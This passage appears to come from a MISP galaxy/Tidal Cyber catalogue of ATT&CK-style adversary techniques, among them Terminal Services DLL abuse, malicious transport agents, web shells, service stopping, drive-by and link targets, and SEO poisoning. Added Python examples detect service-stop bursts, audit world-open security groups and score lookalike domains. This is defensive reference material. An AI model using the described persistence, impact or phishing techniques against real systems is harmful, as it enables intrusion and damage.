The tag is: misp-galaxy:technique="SQL Stored Procedures"

Terminal Services DLL

Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.<sup>[[Microsoft Remote Desktop Services](https://app.tidalcyber.com/references/a981e013-f839-46e9-9c8a-128c4897f77a)]</sup>

[Windows Service](https://app.tidalcyber.com/technique/31c6dd3c-3eb2-46a9-ab85-9e8e145810a1)s that are run as a "generic" process (ex: <code>svchost.exe</code>) load the service’s DLL file, the location of which is stored in a Registry entry named <code>ServiceDll</code>.<sup>[[Microsoft System Services Fundamentals](https://app.tidalcyber.com/references/25d54a16-59a0-497d-a4a5-021420da8f1c)]</sup> The <code>termsrv.dll</code> file, typically stored in %SystemRoot%\System32\, is the default <code>ServiceDll</code> value for Terminal Services in HKLM\System\CurrentControlSet\services\TermService\Parameters\.

Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.<sup>[[James TermServ DLL](https://app.tidalcyber.com/references/5a9e4f0f-83d6-4f18-a358-a9ad450c2734)]</sup> Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal <code>termsrv.dll</code> functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://app.tidalcyber.com/technique/f5fb86b6-abf0-4d44-b4a0-56f0636c24d2) sessions by either patching the <code>termsrv.dll</code> file or modifying the <code>ServiceDll</code> value to point to a DLL that provides increased RDP functionality.<sup>[[Windows OS Hub RDP](https://app.tidalcyber.com/references/335480f8-8f40-4da7-b083-6a4b158496c1)]</sup><sup>[[RDPWrap Github](https://app.tidalcyber.com/references/777a0a6f-3684-4888-ae1b-adc386be763a)]</sup> On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.

The tag is: misp-galaxy:technique="Terminal Services DLL"

Transport Agent

Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.<sup>[[Microsoft TransportAgent Jun 2016](https://app.tidalcyber.com/references/16ae3e7e-5f0d-4ca9-8453-be960b2111b6)]</sup><sup>[[ESET LightNeuron May 2019](https://app.tidalcyber.com/references/679aa333-572c-44ba-b94a-606f168d1ed2)]</sup> Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks.

Adversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.<sup>[[ESET LightNeuron May 2019](https://app.tidalcyber.com/references/679aa333-572c-44ba-b94a-606f168d1ed2)]</sup> Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary.

The tag is: misp-galaxy:technique="Transport Agent"

Web Shell

Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.<sup>[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)]</sup>

In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://app.tidalcyber.com/software/723c5ab7-23ca-46f2-83bb-f1d1e550122c) Web shell client).<sup>[[Lee 2013](https://app.tidalcyber.com/references/6d1e2b0a-fed2-490b-be25-6580dfb7d6aa)]</sup>

The tag is: misp-galaxy:technique="Web Shell"

Server Software Component

Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.<sup>[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)]</sup>

The tag is: misp-galaxy:technique="Server Software Component"

Service Stop

Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary’s overall objectives to cause damage to the environment.<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup><sup>[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]</sup>

Adversaries may accomplish this by disabling individual services of high importance to an organization, such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible.<sup>[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]</sup> In some cases, adversaries may stop or disable many or all services to render systems unusable.<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup> Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) or [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3) on the data stores of services like Exchange and SQL Server.<sup>[[SecureWorks WannaCry Analysis](https://app.tidalcyber.com/references/522b2a19-1d15-48f8-8801-c64d3abd945a)]</sup>
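Both patterns above (a single high-value service such as MSExchangeIS being stopped, and many services stopped in quick succession before destruction or encryption) can be picked out of the Service Control Manager events in the Windows System log. The detector below is an added example written for this page (not MISP, Tidal or ATT&CK code); the log lines are constructed and simplified (real 7036/7040 messages carry the service display name), and the critical-service list and burst threshold are assumptions to tune.

```python
import re
from datetime import datetime, timedelta
from typing import List, Tuple

# Services whose stop or disablement is rarely legitimate outside a change window
# (assumed list; extend with backup agents, EDR, etc. for your estate).
CRITICAL_SERVICES = {"MSExchangeIS", "MSExchangeTransport", "MSSQLSERVER",
                     "WinDefend", "Sense", "EventLog", "VSS"}
BURST_THRESHOLD = 5                   # distinct services stopped ...
BURST_WINDOW = timedelta(seconds=60)  # ... within this window => mass service stop

# Constructed Service Control Manager lines (System log, event ids 7036 and 7040),
# simplified to "<ISO time> <event id> <message>". Short service names are used
# here for brevity; real messages carry the display name.
SAMPLE_LOG = """\
2024-05-01T02:00:00Z 7036 The Spooler service entered the stopped state.
2024-05-01T02:00:05Z 7036 The Spooler service entered the running state.
2024-05-01T03:15:01Z 7036 The MSExchangeIS service entered the stopped state.
2024-05-01T03:15:02Z 7036 The MSExchangeTransport service entered the stopped state.
2024-05-01T03:15:02Z 7036 The MSSQLSERVER service entered the stopped state.
2024-05-01T03:15:03Z 7036 The VSS service entered the stopped state.
2024-05-01T03:15:05Z 7036 The SQLWriter service entered the stopped state.
2024-05-01T03:15:09Z 7040 The start type of the WinDefend service was changed from auto start to disabled.
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<eid>\d+)\s+(?P<msg>.+)$")
STOP_RE = re.compile(r"^The (?P<svc>.+?) service entered the stopped state\.$")
DISABLE_RE = re.compile(r"^The start type of the (?P<svc>.+?) service was changed from .+ to disabled\.$")

Record = Tuple[datetime, str, str]   # (time, service, "stopped" | "disabled")


def parse_scm_log(text: str) -> List[Record]:
    """Keep only 7036 'stopped' transitions and 7040 changes to 'disabled'."""
    records: List[Record] = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
        eid, msg = int(m["eid"]), m["msg"]
        if eid == 7036:
            s = STOP_RE.match(msg)
            if s:
                records.append((ts, s["svc"], "stopped"))
        elif eid == 7040:
            d = DISABLE_RE.match(msg)
            if d:
                records.append((ts, d["svc"], "disabled"))
    return sorted(records)


def detect_service_stop(records: List[Record]) -> List[dict]:
    alerts: List[dict] = []
    # Rule 1: any stop or disablement of a service on the critical list.
    for ts, svc, action in records:
        if svc in CRITICAL_SERVICES:
            alerts.append({"type": f"critical_service_{action}", "service": svc, "time": ts})
    # Rule 2: many distinct services stopped inside a short sliding window.
    stops = [(ts, svc) for ts, svc, action in records if action == "stopped"]
    start, burst = 0, None
    for end in range(len(stops)):
        while stops[end][0] - stops[start][0] > BURST_WINDOW:
            start += 1
        window = {svc for _, svc in stops[start:end + 1]}
        if len(window) >= BURST_THRESHOLD:
            if burst is None:   # open one alert per burst and grow it
                burst = {"type": "mass_service_stop", "start": stops[start][0], "services": set()}
                alerts.append(burst)
            burst["services"] |= window
            burst["end"] = stops[end][0]
            burst["count"] = len(burst["services"])
        else:
            burst = None
    return alerts


if __name__ == "__main__":
    for alert in detect_service_stop(parse_scm_log(SAMPLE_LOG)):
        print(alert)
```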

The tag is: misp-galaxy:technique="Service Stop"

Shared Modules

Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560)).

Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, adversaries can modularize functionality of their malware into shared objects that perform various functions such as managing C2 network communications or execution of specific actions on objective.

The Linux & macOS module loader can load and execute shared objects from arbitrary local paths. This functionality resides in dlfcn.h in functions such as dlopen and dlsym. Although macOS can execute .so files, common practice uses .dylib files.<sup>[[Apple Dev Dynamic Libraries](https://app.tidalcyber.com/references/39ffd162-4052-57ec-bd20-2fe6b8e6beab)]</sup><sup>[[Linux Shared Libraries](https://app.tidalcyber.com/references/054d769a-f88e-55e9-971a-f169ee434cfe)]</sup><sup>[[RotaJakiro 2021 netlab360 analysis](https://app.tidalcyber.com/references/7a9c53dd-2c0e-5452-9ee2-01531fbf8ba8)]</sup><sup>[[Unit42 OceanLotus 2017](https://app.tidalcyber.com/references/fcaf57f1-6696-54a5-a78c-255c8f6ac235)]</sup>

The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) which is called from functions like LoadLibrary at run time.<sup>[[Microsoft DLL](https://app.tidalcyber.com/references/f0ae2788-537c-5644-ba1b-d06a612e73c1)]</sup>

The tag is: misp-galaxy:technique="Shared Modules"

Software Deployment Tools

Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).

Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints. Network infrastructure may also have administration tools that can be similarly abused by adversaries. <sup>[[Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation](https://app.tidalcyber.com/references/a43dd8ce-23d6-5768-8522-6973dc45e1ac)]</sup>

The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform its intended purpose.

The tag is: misp-galaxy:technique="Software Deployment Tools"

Security Software Discovery

Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Example commands that can be used to obtain security software information are [netsh](https://app.tidalcyber.com/software/803192b8-747b-4108-ae15-2d7481d39162), <code>reg query</code> with [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532), <code>dir</code> with [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8), and [Tasklist](https://app.tidalcyber.com/software/abae8f19-9497-4a71-82b6-ae6edd26ad98), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.

Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.<sup>[[Expel IO Evil in AWS](https://app.tidalcyber.com/references/4c2424d6-670b-4db0-a752-868b4c954e29)]</sup> For example, the permitted IP ranges, ports or user accounts for the inbound/outbound rules of security groups, virtual firewalls established within AWS for EC2 and/or VPC instances, can be revealed by the <code>DescribeSecurityGroups</code> action with various request parameters. <sup>[[DescribeSecurityGroups - Amazon Elastic Compute Cloud](https://app.tidalcyber.com/references/aa953df5-40b5-42d2-9e33-a227a093497f)]</sup>
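The DescribeSecurityGroups data named above is the same data a defender should be reviewing. The following is an added example, not part of the MISP galaxy or of AWS documentation: it takes the response shape that boto3's describe_security_groups() returns and flags inbound rules open to the whole Internet (0.0.0.0/0 or ::/0). The response dict, group IDs and names are constructed for the example.

```python
"""Audit an EC2 DescribeSecurityGroups response for world-reachable inbound rules.

Constructed example. SAMPLE_RESPONSE mirrors the field names of the real API
response (SecurityGroups, IpPermissions, IpRanges/CidrIp, Ipv6Ranges/CidrIpv6)
but the values are invented.
"""
from typing import Any, Dict, List

ANY_V4 = "0.0.0.0/0"
ANY_V6 = "::/0"


def _port_label(perm: Dict[str, Any]) -> str:
    """Human-readable protocol/port summary; IpProtocol "-1" means all traffic."""
    proto = perm.get("IpProtocol", "-1")
    if proto == "-1":
        return "all traffic"
    lo, hi = perm.get("FromPort"), perm.get("ToPort")
    return f"{proto}/{lo}" if lo == hi else f"{proto}/{lo}-{hi}"


def world_open_ingress(response: Dict[str, Any]) -> List[Dict[str, str]]:
    """One finding per (group, permission, source) reachable from the whole Internet."""
    findings = []
    for sg in response.get("SecurityGroups", []):
        for perm in sg.get("IpPermissions", []):
            v4 = [r["CidrIp"] for r in perm.get("IpRanges", []) if r.get("CidrIp") == ANY_V4]
            v6 = [r["CidrIpv6"] for r in perm.get("Ipv6Ranges", []) if r.get("CidrIpv6") == ANY_V6]
            for cidr in v4 + v6:
                findings.append({
                    "group_id": sg["GroupId"],
                    "group_name": sg.get("GroupName", ""),
                    "ports": _port_label(perm),
                    "source": cidr,
                })
    return findings


# Constructed response: a web group with HTTPS and SSH open to the world, and a
# database group that is correctly restricted on 5432 but has a stray
# allow-all rule.
SAMPLE_RESPONSE = {
    "SecurityGroups": [
        {
            "GroupId": "sg-0example0web",
            "GroupName": "web-frontend",
            "IpPermissions": [
                {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
                 "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": [{"CidrIpv6": "::/0"}]},
                {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
                 "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
            ],
        },
        {
            "GroupId": "sg-0example0db",
            "GroupName": "database",
            "IpPermissions": [
                {"IpProtocol": "tcp", "FromPort": 5432, "ToPort": 5432,
                 "IpRanges": [{"CidrIp": "10.0.0.0/16"}], "Ipv6Ranges": [],
                 "UserIdGroupPairs": [{"GroupId": "sg-0example0web"}]},
                {"IpProtocol": "-1", "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
            ],
        },
    ]
}

if __name__ == "__main__":
    for f in world_open_ingress(SAMPLE_RESPONSE):
        print(f"{f['group_id']} ({f['group_name']}): {f['ports']} from {f['source']}")
```

Against a real account the input would be `boto3.client("ec2").describe_security_groups()`; the check is intentionally strict (HTTPS open to the world on a public web tier is expected, SSH and allow-all rules usually are not), so the output is a review list rather than a verdict.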

The tag is: misp-galaxy:technique="Security Software Discovery"

Software Discovery

Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://app.tidalcyber.com/technique/e9bff6ff-3142-4910-8f67-19b868912602) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c).

The tag is: misp-galaxy:technique="Software Discovery"

Drive-by Target

Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381). In such cases, the user’s web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc). Prior to [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or previously compromised ([Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)).

Adversaries may upload or inject malicious web content, such as [JavaScript](https://app.tidalcyber.com/technique/8a669da8-8894-4fb0-9124-c3c8418985cc), into websites.<sup>[[FireEye CFR Watering Hole 2012](https://app.tidalcyber.com/references/6108ab77-e4fd-43f2-9d49-8ce9c219ca9c)]</sup><sup>[[Gallagher 2015](https://app.tidalcyber.com/references/b1540c5c-0bbc-4b9d-9185-fae224ba31be)]</sup> This may be done in a number of ways, including:

  • Inserting malicious scripts into web pages or other user controllable web content such as forum posts

  • Modifying script files served to websites from publicly writeable cloud storage buckets

  • Crafting malicious web advertisements and purchasing ad space on a website through legitimate ad providers (i.e., [Malvertising](https://app.tidalcyber.com/technique/60ac24aa-ce63-5c1d-8126-db20a27d85be))

In addition to staging content to exploit a user’s web browser, adversaries may also stage scripting content to profile the user’s browser (as in [Gather Victim Host Information](https://app.tidalcyber.com/technique/4acf57da-73c1-4555-a86a-38ea4a8b962d)) to ensure it is vulnerable prior to attempting exploitation.<sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup>

Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to as a strategic web compromise or watering hole attack.

Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)) to help facilitate [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381).

The tag is: misp-galaxy:technique="Drive-by Target"

Install Digital Certificate

Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.<sup>[[DigiCert Install SSL Cert](https://app.tidalcyber.com/references/a1d7d368-6092-4421-99de-44e458deee21)]</sup>

Adversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://app.tidalcyber.com/technique/ce822cce-f7f1-4753-bff1-12e5bef66d53) with [Web Protocols](https://app.tidalcyber.com/technique/9a21ec7b-9714-4073-9bf3-4df41995c698)) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers.

Adversaries can obtain digital certificates (see [Digital Certificates](https://app.tidalcyber.com/technique/4c0db4e5-14e0-4fb7-88b0-bb391ce5ad58)) or create self-signed certificates (see [Digital Certificates](https://app.tidalcyber.com/technique/5bcbb0c5-7061-481f-a677-09028a6c59f7)). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or previously compromised ([Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)).

The tag is: misp-galaxy:technique="Install Digital Certificate"

Link Target

Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://app.tidalcyber.com/technique/46f60fff-71a1-4cfd-b639-71a0ac903bbb). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://app.tidalcyber.com/technique/4a68c72c-79c1-4fed-9107-75bb5b06dfc3)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d)), an adversary must set up the resources for a link target for the spearphishing link.

Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://app.tidalcyber.com/technique/8a669da8-8894-4fb0-9124-c3c8418985cc) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target; this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during Spearphishing Link.<sup>[[Malwarebytes Silent Librarian October 2020](https://app.tidalcyber.com/references/9bb8ddd0-a8ec-459b-9983-79ccf46297ca)]</sup><sup>[[Proofpoint TA407 September 2019](https://app.tidalcyber.com/references/e787e9af-f496-442a-8b36-16056ff8bfc1)]</sup> Adversaries may also [Upload Malware](https://app.tidalcyber.com/technique/8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe) and have the link target point to malware for download/execution by the user.

Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)) to help facilitate [Malicious Link](https://app.tidalcyber.com/technique/46f60fff-71a1-4cfd-b639-71a0ac903bbb). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.<sup>[[Netskope GCP Redirection](https://app.tidalcyber.com/references/18efeffc-c47b-46ad-8e7b-2eda30a406f0)]</sup><sup>[[Netskope Cloud Phishing](https://app.tidalcyber.com/references/25d46bc1-4c05-48d3-95f0-aa3ee1100bf9)]</sup><sup>[[Intezer App Service Phishing](https://app.tidalcyber.com/references/e86abbd9-f349-4d90-8ec9-899fe1637f94)]</sup> Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.<sup>[[Talos IPFS 2022](https://app.tidalcyber.com/references/dc98c7ce-0a3f-5f35-9885-6c1c73e5858d)]</sup>
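The lookalike-domain tricks listed here (homoglyphs, typosquatting, a different top-level domain) also appear in the Drive-by Target entry above, and the defender's counterpart is brand monitoring of newly observed domains. The following is an added example, not code from the MISP galaxy or any cited source: it reduces each candidate domain to a skeleton (accents stripped, common confusable characters folded) and compares it with a list of protected brand labels. The brand, legitimate domain, candidate list and confusables table are constructed for the example and deliberately small.

```python
"""Score observed domains for resemblance to protected brand names.

Constructed example. BRANDS maps a protected second-level label to its
legitimate domain; CONFUSABLES is a tiny stand-in for a full confusables
table such as the Unicode UTS #39 data.
"""
import unicodedata
from typing import Dict, List, Tuple

# Assumption: a handful of ASCII/Cyrillic confusables; extend for production use.
CONFUSABLES = {
    "0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "rn": "m", "vv": "w",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0445": "x", "\u0456": "i",
}


def registrable_label(domain: str) -> str:
    """Second-level label of a domain, with punycode (xn--) labels decoded."""
    d = domain.lower().rstrip(".")
    try:
        d = d.encode("ascii").decode("idna")
    except UnicodeError:
        pass  # already Unicode, or not valid punycode: compare as given
    parts = d.split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def skeleton(label: str) -> str:
    """Fold a label to the form a human would visually read it as."""
    s = unicodedata.normalize("NFKD", label)
    s = "".join(ch for ch in s if not unicodedata.combining(ch))
    for src, dst in CONFUSABLES.items():
        s = s.replace(src, dst)
    return s


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch single-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_findings(candidates: List[str], brands: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """(domain, brand, reason) for every candidate that resembles a protected brand."""
    out = []
    for dom in candidates:
        label = registrable_label(dom)
        folded = skeleton(label)
        for brand, legit in brands.items():
            if dom.lower() == legit:
                continue  # the real site
            if label != brand and folded == brand:
                out.append((dom, brand, "homoglyph"))
            elif label == brand:
                out.append((dom, brand, "different TLD"))
            elif levenshtein(folded, brand) == 1:
                out.append((dom, brand, "typosquat"))
    return out


# Constructed inputs.
BRANDS = {"examplebank": "examplebank.com"}
CANDIDATES = [
    "examplebank.com",          # legitimate
    "examplebank.net",          # same label, other TLD
    "exarnplebank.com",         # 'rn' reads as 'm'
    "examplebamk.com",          # one-character edit
    "exampleb\u0430nk.com",     # Cyrillic small a
    "unrelated.org",
]

if __name__ == "__main__":
    for dom, brand, reason in lookalike_findings(CANDIDATES, BRANDS):
        print(f"{dom!r} resembles {brand}: {reason}")
```

The skeleton step is what makes the homoglyph and punycode cases comparable at all; the edit-distance threshold of 1 is a conservative choice that keeps false positives low on short brand names and should be raised with care for longer ones.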

The tag is: misp-galaxy:technique="Link Target"

SEO Poisoning

Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.<sup>[[Atlas SEO](https://app.tidalcyber.com/references/26d7134e-7b93-4aa1-a859-03cf964ca1b5)]</sup><sup>[[MalwareBytes SEO](https://app.tidalcyber.com/references/250b09a2-dd97-4fbf-af2f-618d1f126957)]</sup>

To help facilitate [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://app.tidalcyber.com/technique/f2661f07-9027-4d19-9028-d07b7511f3d5)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).<sup>[[ZScaler SEO](https://app.tidalcyber.com/references/f117cfa5-1bad-43ae-9eaa-3b9123061f93)]</sup><sup>[[Atlas SEO](https://app.tidalcyber.com/references/26d7134e-7b93-4aa1-a859-03cf964ca1b5)]</sup>

Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.<sup>[[MalwareBytes SEO](https://app.tidalcyber.com/references/250b09a2-dd97-4fbf-af2f-618d1f126957)]</sup><sup>[[DFIR Report Gootloader](https://app.tidalcyber.com/references/aa12dc30-ba81-46c5-b412-ca4a01e72d7f)]</sup>

SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.<sup>[[ZScaler SEO](https://app.tidalcyber.com/references/f117cfa5-1bad-43ae-9eaa-3b9123061f93)]</sup><sup>[[Sophos Gootloader](https://app.tidalcyber.com/references/63357292-0f08-4405-a45a-34b606ab7110)]</sup>

The tag is: misp-galaxy:technique="SEO Poisoning"

Upload Malware

Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242) by placing it on an Internet accessible web server.

Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or was otherwise compromised by them ([Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)). Malware can also be staged on web services, such as GitHub or Pastebin, or hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult.<sup>[[Volexity Ocean Lotus November 2020](https://app.tidalcyber.com/references/dbea2493-7e0a-47f0-88c1-5867f8bb1199)]</sup><sup>[[Talos IPFS 2022](https://app.tidalcyber.com/references/dc98c7ce-0a3f-5f35-9885-6c1c73e5858d)]</sup>

